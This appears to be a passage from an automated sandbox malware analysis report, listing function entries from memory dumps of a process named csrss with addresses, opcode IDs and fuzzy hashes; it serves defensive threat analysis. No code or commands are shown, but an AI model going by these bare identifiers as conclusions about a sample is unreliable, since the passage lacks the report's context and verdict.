                          • Instruction Fuzzy Hash: D9118F70A0964E8FEB64EFA488696B977F0FF18308F0106BED41DC35A6DE346540C701
                          Function 00007FFD9B795E39 Relevance: .1, Instructions: 55COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8046a130fc622f375f28e7374944160a55b080a3029f0a5c98eab21a4608f5fc
                          • Instruction ID: 0961218f472c1048bfe0c30d4891e51c0876ae67fd2d64f9e2bce30c6fa13836
                          • Opcode Fuzzy Hash: 8046a130fc622f375f28e7374944160a55b080a3029f0a5c98eab21a4608f5fc
                          • Instruction Fuzzy Hash: EC115131E0AB9E8EE751AB7488696A97BF0FF15300F4505B6D41CCB0B6EA34A544C711
                          Function 00007FFD9B78BB35 Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a466aa7e34f4728793f445f58e992a192cb59ac23c5c1c0df48ed45c889d58b
                          • Instruction ID: 6007257e93b6916e3aae6acb97b8978435c491ed619084189ad4910939072631
                          • Opcode Fuzzy Hash: 3a466aa7e34f4728793f445f58e992a192cb59ac23c5c1c0df48ed45c889d58b
                          • Instruction Fuzzy Hash: 34118230A09A4E8FDB94EF64C8A86BD7BF0FF18301F1105BAD419C71B6DA359640C700
                          Function 00007FFD9B794D0D Relevance: .1, Instructions: 54COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 206b671a19e5e5399bdc1ffab216a45350a7dfe948f226a0cde2dcf0e2867ec5
                          • Instruction ID: 6a38bdbcadee8d7f583f81566f9c89c0f78d17bfbbcdaadbdddd129ccc99a0f5
                          • Opcode Fuzzy Hash: 206b671a19e5e5399bdc1ffab216a45350a7dfe948f226a0cde2dcf0e2867ec5
                          • Instruction Fuzzy Hash: A411C130A0964E4FEB65EB6484696B977E0FF28304F0105BED42DC61F2DF34A240C701
                          Function 00007FFD9B782E41 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 731801dd22d5c6dcd413103a5156c57117e8bede0aa7d9c5dbfa110b517ae368
                          • Instruction ID: 55f4727bdaa08080e148376e37aaacd207a5225cf8827f51ecafc9c4811b8a03
                          • Opcode Fuzzy Hash: 731801dd22d5c6dcd413103a5156c57117e8bede0aa7d9c5dbfa110b517ae368
                          • Instruction Fuzzy Hash: CA018831E1AA4E5FE761ABA4849C5A976E0FF59302F1246B6D418C60F6EE34E6548600
                          Function 00007FFD9B78BF89 Relevance: .1, Instructions: 52COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d0f3dbc7c4c6336d2f2d550ec6ec1a363640e5a861e2d243b545dba79d7c8ae
                          • Instruction ID: c3e2dab1980ccd7f644c333cee5492bf1b0df52a9eaad29ff6acacbc97edc3a4
                          • Opcode Fuzzy Hash: 6d0f3dbc7c4c6336d2f2d550ec6ec1a363640e5a861e2d243b545dba79d7c8ae
                          • Instruction Fuzzy Hash: 7B116130A0AA4E8FDB95EFA4C4A96B97BB0FF15311F1505BEC419C71B6DA35A641CB00
                          Function 00007FFD9B78C379 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96823472fd2f875c92a9cbcafb0c5a2b004c184f50e6116cd7c41532426d3e89
                          • Instruction ID: ae5a69fb9b647f684abc82ffb990598ea9e82d33518a478a599e2df6decf5951
                          • Opcode Fuzzy Hash: 96823472fd2f875c92a9cbcafb0c5a2b004c184f50e6116cd7c41532426d3e89
                          • Instruction Fuzzy Hash: 2111E030A0EB8E8FDB59DF24C4A91A93BB1EF19301F5201BED409C74A2CA35A645C781
                          Function 00007FFD9B794F35 Relevance: .1, Instructions: 51COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6b2fb0dd640bed75ae2b9a6ba780bf85937e737ebac38186367c67d8add5317
                          • Instruction ID: e216cd4ade74dfdec788bb47c3eeef3ac8a9a87044e81e596f495f71d3ae7490
                          • Opcode Fuzzy Hash: a6b2fb0dd640bed75ae2b9a6ba780bf85937e737ebac38186367c67d8add5317
                          • Instruction Fuzzy Hash: 9A01F530A1968E8FD761EBA488685E937E1FF18300F0605BAD418C71B2EE34E640C700
                          Function 00007FFD9B7805D8 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e2e601c32004e3e864e3e43088a71571f9408e9e7eb617794a60d449a96ea5f9
                          • Instruction ID: c1048f38c98fa595d3aaeb3f60d7d4dba581f5e738a871a52782c8e8c9e5f23c
                          • Opcode Fuzzy Hash: e2e601c32004e3e864e3e43088a71571f9408e9e7eb617794a60d449a96ea5f9
                          • Instruction Fuzzy Hash: 9A018030A0AA0E8EEB58EF64C0A56B977A1FF58305F11457AD40EC35F5DA31A650C740
                          Function 00007FFD9B7921C1 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a5d8128f827b60e107bb704ce00baff400af6d14035493a940bab7475dc17de9
                          • Instruction ID: fda1e21031daf9ed3f3f2638b1130ab49c1d4dff8f0ee3606e0b69b53b64a32f
                          • Opcode Fuzzy Hash: a5d8128f827b60e107bb704ce00baff400af6d14035493a940bab7475dc17de9
                          • Instruction Fuzzy Hash: F1018F30E4960E8FEB59EFA4C465AF937B0FF19304F5209BAD41AC71A6DA39A654C700
                          Function 00007FFD9B78AE85 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 396a0ce959e4638cff390ceab6c95e4ceebc1ca7b6551d6afa4dc5c274dd01c1
                          • Instruction ID: ab81d1afad46360b5ec94d4f66e7f7ab536ccbcfbac4792b5f394e8b04b1ce46
                          • Opcode Fuzzy Hash: 396a0ce959e4638cff390ceab6c95e4ceebc1ca7b6551d6afa4dc5c274dd01c1
                          • Instruction Fuzzy Hash: B5019E30E1AB4E8FE750EFA4C49A5A97BE0EF14301F0649BAD408C70B6DE38A6408700
                          Function 00007FFD9B782EB9 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c535f5294d51e49a764d35a7dfacb70f321e3f8e154c2ebf8687ff52f52e0fb5
                          • Instruction ID: 86f3df2f95f7215b54cb8fa4403ed9e04c48b46896b9c2c83a1440d603179299
                          • Opcode Fuzzy Hash: c535f5294d51e49a764d35a7dfacb70f321e3f8e154c2ebf8687ff52f52e0fb5
                          • Instruction Fuzzy Hash: 7601D430E0EB4E5FE751EBB488A95A93BE0EF19312F5606F2D418C70F6EA38A544C300
                          Function 00007FFD9B797A09 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 19125e4d0a66af6b63896cf8ff162a39df58d28a00c9c96a35d802e09f8678fa
                          • Instruction ID: a25965386813e704c726636ada991e297892df8e65b0ac8550921c59e6177e69
                          • Opcode Fuzzy Hash: 19125e4d0a66af6b63896cf8ff162a39df58d28a00c9c96a35d802e09f8678fa
                          • Instruction Fuzzy Hash: E501CC30A0E78E5FDB59EB6888696B93BA0EF15304F0205FAC009C60F2DA35A600C701
                          Function 00007FFD9B78281D Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1701fb477d5b4d52ca81d01704b0fb7150062ff93d69d2b84f20269e65e89202
                          • Instruction ID: bc518529501b93d6d338636b6d15f0e49ca566dcd1a44d6ab855b7746fa3cf99
                          • Opcode Fuzzy Hash: 1701fb477d5b4d52ca81d01704b0fb7150062ff93d69d2b84f20269e65e89202
                          • Instruction Fuzzy Hash: 6701D831E0AA4E4FEB51EBA4949C5A97BE0EF15302F4206B6D408C70B5DA34E5408700
                          Function 00007FFD9B797429 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e16b89c919a9bc43fff98dad7e4b4fcaffb1b8e03ffc34d3c32bf31e91a83f4
                          • Instruction ID: 1aa367620872f02082ffdf90811874f3acca92edafb7ea4e919cb0f8f45bb8e9
                          • Opcode Fuzzy Hash: 6e16b89c919a9bc43fff98dad7e4b4fcaffb1b8e03ffc34d3c32bf31e91a83f4
                          • Instruction Fuzzy Hash: 3601F230A5E74E5FE712EB748868AA93FE0EF09304F4645F3D808CB0B7EA28A544C311
                          Function 00007FFD9B781C35 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a1be3c7887b6cc4560c63dc04a556ef34cbff8dd2376ac0941b574c473a8fd2
                          • Instruction ID: 75fff80632da973eca926336da4914dd045900db669f28735f2aeabc7084d816
                          • Opcode Fuzzy Hash: 4a1be3c7887b6cc4560c63dc04a556ef34cbff8dd2376ac0941b574c473a8fd2
                          • Instruction Fuzzy Hash: CF01D630A0EB8E8FEB94DF6484652B97BA1FF19301F41057AD408C74F1DB759550C740
                          Function 00007FFD9B78A909 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4a3e5032ac01bd0897c5f1e8b08453931e748cf4d77030bc5ce810cee634c437
                          • Instruction ID: 847c1671ae540d7c6f552aee63f02dbd21f2619c6db851964263d3b27a052530
                          • Opcode Fuzzy Hash: 4a3e5032ac01bd0897c5f1e8b08453931e748cf4d77030bc5ce810cee634c437
                          • Instruction Fuzzy Hash: AA018431A4EB8E4FE762EB7488A95A97BF0EF15301F0746F2D008C70B2EA38A5448741
                          Function 00007FFD9B780608 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0ff7e6f393a8343a79cd212861672830e6a33ad9bad143ccfe30c66a910e8de1
                          • Instruction ID: 5c7ff537545182e8ce124590b1228a5d7af1149230c6380345acda52149af59d
                          • Opcode Fuzzy Hash: 0ff7e6f393a8343a79cd212861672830e6a33ad9bad143ccfe30c66a910e8de1
                          • Instruction Fuzzy Hash: EC018130A15A0E9FEB59EBA4C4A86B973E0FF19306F51097ED41EC21F5DE35A650CA40
                          Function 00007FFD9B780610 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ff8eeec5053965c091078e1c0feccdf7c37c8d265da8266a06dd25172d424596
                          • Instruction ID: bae7a0e9abcb131c7ce28fa62e4fe9e5595cc9c9dfa58b9903ced6a5d011a4b6
                          • Opcode Fuzzy Hash: ff8eeec5053965c091078e1c0feccdf7c37c8d265da8266a06dd25172d424596
                          • Instruction Fuzzy Hash: 72018630A19A0E9AEB58EBA4C4A85B973E0FF18307F51057ED41EC21F5DE35A550CB10
                          Function 00007FFD9B7805D0 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4aff9583db81b2f20c67af90727dc28e8f5eb0b1811657e6e107465eb4fc3a5
                          • Instruction ID: d48a84d99eabe8bd876072002c1b89c3bb88dad3d7b36751f69d12d13f00f10a
                          • Opcode Fuzzy Hash: a4aff9583db81b2f20c67af90727dc28e8f5eb0b1811657e6e107465eb4fc3a5
                          • Instruction Fuzzy Hash: 88F0C230A0AA4E8FEB54EE6894656FA37A0FF19305F11057AE80DC34F1DF35A650CB80
                          Function 00007FFD9B7811C0 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7f2baecbe095bd040203103c7e71950421c328b402720770f7e5cc5ca550a9cc
                          • Instruction ID: 4500f943580d104b17a943abb88d528466077c9ab2c90e2f7012bd3b68df5470
                          • Opcode Fuzzy Hash: 7f2baecbe095bd040203103c7e71950421c328b402720770f7e5cc5ca550a9cc
                          • Instruction Fuzzy Hash: 1DF0C271E0AB5E4AFBA49BE498A92F977E0FF59306F01017AD41EC64F1EE342754C640
                          Function 00007FFD9B782739 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1d99eeb024cae3ab7922b7ad2399ca9ca3cc7d885652d6fcef6e927a5a24340
                          • Instruction ID: a373bc63199d5f86a0844828725a12c519e2df18f5266b4006cc1304e6dcf4e1
                          • Opcode Fuzzy Hash: b1d99eeb024cae3ab7922b7ad2399ca9ca3cc7d885652d6fcef6e927a5a24340
                          • Instruction Fuzzy Hash: 8EF0C23191E7CD8FDB6AAB6088752A97BA0BF16302F4605BAD509C60F2DA389504C741
                          Function 00007FFD9B78B044 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 090167885b90f117ee3c2ef51d52c6040e1aad0b12cb03189d7f12d47266b7a1
                          • Instruction ID: 20c2471771de77824f144cc32f870274f78f9a3e809665c9b9bdc0fcc2deac03
                          • Opcode Fuzzy Hash: 090167885b90f117ee3c2ef51d52c6040e1aad0b12cb03189d7f12d47266b7a1
                          • Instruction Fuzzy Hash: 64F03C70E19A1D8FDBA0DB58C495BA9B3B1EB58301F1182EA940DE7165DE305AC58F40
                          Function 00007FFD9B7827AD Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b780000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4b50cd841b72ee69f5d53e5abf8a1adb2444f6864b5baa682e58fd3f457e944
                          • Instruction ID: 44afe219ff2ef72133df020321ba68ce339fb8414c959787b67a300e4df1faa5
                          • Opcode Fuzzy Hash: f4b50cd841b72ee69f5d53e5abf8a1adb2444f6864b5baa682e58fd3f457e944
                          • Instruction Fuzzy Hash: D6F0B43090E78E8FDB599FA088652A93BA0EF06202F0545BED80CC71F2DB38A504C701
                          Function 00007FFD9B78BD0B Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B78A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78A000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b78a000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction ID: 2c33ef3e475f93cf595fb6b63f8bb2ed8ffa38757c5306a9e2b559fa6980a0c6
                          • Opcode Fuzzy Hash: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction Fuzzy Hash: CFD0E235E0892DCFCF50EBC8D8502ECB3B0FB58301B400122D00DD3261DB3068108B00
                          Function 00007FFD9B79519B Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b0e4165ab074748377f28eedbbba0299bde2451f485cf21bad419fc2f717223
                          • Instruction ID: 9f07c985640824b250be487a7e1187eb94490861544205dad7786f8a28c7a3bf
                          • Opcode Fuzzy Hash: 1b0e4165ab074748377f28eedbbba0299bde2451f485cf21bad419fc2f717223
                          • Instruction Fuzzy Hash: B6D01271E56B1E8FDBA4DEA9849D298BBF1FF58301F42412ED418D3175DF3024419B00

                          Non-executed Functions

                          Function 00007FFD9B791303 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.1832346630.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_7ffd9b791000_csrss.jbxd
                          Similarity
                          • API ID:
                          • String ID: "$'$)$/$]
                          • API String ID: 0-2511809083
                          • Opcode ID: 4fba03b3b681dbcad54d68821781ed0449dcf631317f01826db823b249f88040
                          • Instruction ID: 85b47350dd7ee6321095011c5ef53f365a7b1c9a81c26b2b5f380d6722a9759e
                          • Opcode Fuzzy Hash: 4fba03b3b681dbcad54d68821781ed0449dcf631317f01826db823b249f88040
                          • Instruction Fuzzy Hash: AB41AA70E1561E8FDB68DF94C8A4BEDB7B1EB58711F1141AAD00EA72A1CA345AC0CF10